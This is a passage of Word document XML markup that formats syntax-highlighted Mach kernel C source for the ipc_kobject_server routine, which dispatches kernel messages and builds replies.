          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="2"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E36D3" w:rsidRPr="005E36D3" w:rsidRDefault="005E36D3" w:rsidP="005E36D3">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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Routine:    ipc_kobject_server</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> *  Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> *      Handle a message sent to the kernel.</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> *      Generates a reply message.</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> *      Version for Untyped IPC.</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> *  Conditions:</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t> *      Nothing locked.</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r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ipc_kmsg_t</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ipc_kobject_server</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kmsg_t</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>request</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mach_msg_size_t</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reply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kmsg_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kern_return_t</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kr</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port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destp</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mach_msg_format_0_traile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trailer</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gister</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mig_hash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ptr</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Find out corresponding mig_hash entry if any</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gister</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>key</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id</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gister</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>i</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HASH</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>key</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gister</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>max_ite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table_max_disp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do</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pt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amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mig_buckets</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>i</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X_MIG_ENTRIES</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whil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key</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num</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </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num</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</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ax_iter</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routin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key</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num</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pt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ig_hash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008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</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reply_siz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reply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reply_siz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if</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MACH_COUNTER</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>        </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callcount</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endif</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 round up for trailer size */</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reply_siz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X_TRAILER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reply</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pc_kmsg_alloc</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reply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KM_NULL</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printf</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="CC0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"ipc_kobject_server: dropping request\n"</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kmsg_destroy</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turn</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IKM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Initialize reply message.</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>     */</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define</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InP</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ach_msg_heade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define</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OutP</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ig_reply_erro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 </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         * MIG should really assure no data leakage -</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         * but until it does, pessimistically zero the</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>         * whole reply buffer.</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sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bzero</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>((</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</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OutP</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ND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NDR_record</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siz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sizeof</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>mig_reply_error_t</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bits</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MACH_MSGH_BITS_SET</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MACH_MSGH_BITS_LOCAL</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InP</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msgh_bits</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color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</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color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</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color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</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remote_por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nP</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msgh_local_por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local_por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CH_PORT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voucher_por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CH_PORT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OutP</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Head</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msgh_id</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nP</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msgh_id</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color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>100</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undef</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InP</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undef</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OutP</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Find the routine to call, and call it</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>     * to perform the kernel function</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ptr</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sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ptr</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>routine</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kernel_task</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>messages_received</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ipc_kobject_notify</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if</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MACH_IPC_TEST</w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>            </w:t>
      </w:r>
      <w:r w:rsidRPr="005E36D3">
        <w:rPr>
